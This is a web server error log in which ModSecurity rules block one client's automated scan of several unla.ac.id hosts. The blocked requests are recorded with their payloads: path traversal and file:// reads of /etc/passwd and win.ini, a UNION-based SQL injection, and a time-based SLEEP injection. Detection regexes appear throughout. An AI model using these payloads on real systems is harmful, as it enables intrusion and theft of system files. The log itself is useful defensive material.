[Tue Aug 29 11:40:16.362518 2023] [:error] [pid 1691] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:getpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:getpage: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/cgi-bin/webproc"] [unique_id "ZO12sMCo-f0AAAab9T4AAAAV"]
[Tue Aug 29 11:40:17.400694 2023] [:error] [pid 1793] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:lang: ../../../../../../../../../../../usr/local/lib/php/pearcmd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO12scCo-f0AAAcBbY4AAAAH"]
[Tue Aug 29 11:40:21.434381 2023] [:error] [pid 1687] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ?/../../../../../../../../ found within ARGS:target: db_sql.php?/../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12tcCo-f0AAAaXqvcAAAAl"]
[Tue Aug 29 11:40:21.436577 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ?/../../../../../../../../ found within ARGS:target: db_sql.php?/../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12tcCo-f0AAAcYU00AAAAp"]
[Tue Aug 29 11:40:21.439332 2023] [:error] [pid 1678] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ?/../../../../../../../../ found within ARGS:target: db_sql.php?/../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12tcCo-f0AAAaO3hIAAAAX"]
[Tue Aug 29 11:40:21.465276 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ?/../../../../../../../../ found within ARGS:target: db_sql.php?/../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO12tcCo-f0AAAYf-F8AAAAD"]
[Tue Aug 29 11:40:22.407942 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:q: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12tsCo-f0AAAcYU08AAAAp"]
[Tue Aug 29 11:40:22.547699 2023] [:error] [pid 1807] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:q: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO12tsCo-f0AAAcPiwUAAAAa"]
[Tue Aug 29 11:40:22.640571 2023] [:error] [pid 1827] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:q: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12tsCo-f0AAAcjAhsAAAAw"]
[Tue Aug 29 11:40:22.645636 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:q: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12tsCo-f0AAAYMWPkAAAAR"]
[Tue Aug 29 11:40:22.649341 2023] [:error] [pid 1499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:q: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12tsCo-f0AAAXbcLkAAAAL"]
[Tue Aug 29 11:40:22.664729 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ?/../../../../../../../../ found within ARGS:target: db_sql.php?/../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12tsCo-f0AAAcYU1EAAAAp"]
[Tue Aug 29 11:40:25.367811 2023] [:error] [pid 1687] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ?/../../../../../../../../ found within ARGS:target: db_sql.php?/../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12ucCo-f0AAAaXqwAAAAAl"]
[Tue Aug 29 11:40:26.471229 2023] [:error] [pid 1827] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:q: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12usCo-f0AAAcjAigAAAAw"]
[Tue Aug 29 11:40:32.405182 2023] [:error] [pid 1687] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:var: {\\x22body\\x22:{\\x22file\\x22:\\x22file:///etc/passwd\\x22}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/sys/ui/extend/varkind/custom.jsp"] [unique_id "ZO12wMCo-f0AAAaXqwsAAAAl"]
[Tue Aug 29 11:40:32.433573 2023] [:error] [pid 1687] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:var: {\\x22body\\x22:{\\x22file\\x22:\\x22file:///etc/passwd\\x22}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/sys/ui/extend/varkind/custom.jsp"] [unique_id "ZO12wMCo-f0AAAaXqwwAAAAl"]
[Tue Aug 29 11:40:32.435439 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:var: {\\x22body\\x22:{\\x22file\\x22:\\x22file:///etc/passwd\\x22}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/sys/ui/extend/varkind/custom.jsp"] [unique_id "ZO12wMCo-f0AAAYMWQcAAAAR"]
[Tue Aug 29 11:40:32.436995 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:var: {\\x22body\\x22:{\\x22file\\x22:\\x22file:///etc/passwd\\x22}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/sys/ui/extend/varkind/custom.jsp"] [unique_id "ZO12wMCo-f0AAAcYU2sAAAAp"]
[Tue Aug 29 11:40:32.438343 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:var: {\\x22body\\x22:{\\x22file\\x22:\\x22file:///etc/passwd\\x22}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/sys/ui/extend/varkind/custom.jsp"] [unique_id "ZO12wMCo-f0AAAcoNL0AAAAF"]
[Tue Aug 29 11:40:33.383054 2023] [:error] [pid 1807] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:search: URC' union select 1,2,3,4,5,6,7,8,9,md5(999999999),11,12,13,14,15,16,17,18,19-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12wcCo-f0AAAcPiyMAAAAa"]
[Tue Aug 29 11:40:33.383178 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:search: URC' union select 1,2,3,4,5,6,7,8,9,md5(999999999),11,12,13,14,15,16,17,18,19-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO12wcCo-f0AAAcbR@UAAAAv"]
[Tue Aug 29 11:40:33.387641 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:search: URC' union select 1,2,3,4,5,6,7,8,9,md5(999999999),11,12,13,14,15,16,17,18,19-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12wcCo-f0AAAcYU2wAAAAp"]
[Tue Aug 29 11:40:33.391801 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:search: URC' union select 1,2,3,4,5,6,7,8,9,md5(999999999),11,12,13,14,15,16,17,18,19-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12wcCo-f0AAAYf-HQAAAAD"]
[Tue Aug 29 11:40:33.419350 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:search: URC' union select 1,2,3,4,5,6,7,8,9,md5(999999999),11,12,13,14,15,16,17,18,19-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12wcCo-f0AAAYMWQoAAAAR"]
[Tue Aug 29 11:40:36.382629 2023] [:error] [pid 1673] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:var: {\\x22body\\x22:{\\x22file\\x22:\\x22file:///c://windows/win.ini\\x22}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/sys/ui/extend/varkind/custom.jsp"] [unique_id "ZO12xMCo-f0AAAaJJ68AAAAJ"]
[Tue Aug 29 11:40:36.430963 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:var: {\\x22body\\x22:{\\x22file\\x22:\\x22file:///c://windows/win.ini\\x22}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/sys/ui/extend/varkind/custom.jsp"] [unique_id "ZO12xMCo-f0AAAcoNMkAAAAF"]
[Tue Aug 29 11:40:36.490453 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:var: {\\x22body\\x22:{\\x22file\\x22:\\x22file:///c://windows/win.ini\\x22}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/sys/ui/extend/varkind/custom.jsp"] [unique_id "ZO12xMCo-f0AAAQSWmgAAAA0"]
[Tue Aug 29 11:40:36.587009 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:var: {\\x22body\\x22:{\\x22file\\x22:\\x22file:///c://windows/win.ini\\x22}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/sys/ui/extend/varkind/custom.jsp"] [unique_id "ZO12xMCo-f0AAAYMWR0AAAAR"]
[Tue Aug 29 11:40:36.612341 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:var: {\\x22body\\x22:{\\x22file\\x22:\\x22file:///c://windows/win.ini\\x22}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/sys/ui/extend/varkind/custom.jsp"] [unique_id "ZO12xMCo-f0AAAYMWR4AAAAR"]
[Tue Aug 29 11:40:37.389622 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:sccp_id[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  (9752=9752 found within ARGS:sccp_id[]: 1) AND (SELECT 1183 FROM (SELECT(SLEEP(6)))UPad) AND (9752=9752"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO12xcCo-f0AAAYMWSEAAAAR"]
[Tue Aug 29 11:40:37.396335 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:sccp_id[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  (9752=9752 found within ARGS:sccp_id[]: 1) AND (SELECT 1183 FROM (SELECT(SLEEP(6)))UPad) AND (9752=9752"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO12xcCo-f0AAAcoNMwAAAAF"]
[Tue Aug 29 11:40:37.410308 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:sccp_id[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  (9752=9752 found within ARGS:sccp_id[]: 1) AND (SELECT 1183 FROM (SELECT(SLEEP(6)))UPad) AND (9752=9752"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO12xcCo-f0AAAYMWSIAAAAR"]
[Tue Aug 29 11:40:37.417150 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:sccp_id[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  (9752=9752 found within ARGS:sccp_id[]: 1) AND (SELECT 1183 FROM (SELECT(SLEEP(6)))UPad) AND (9752=9752"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO12xcCo-f0AAAcqJEAAAAAG"]
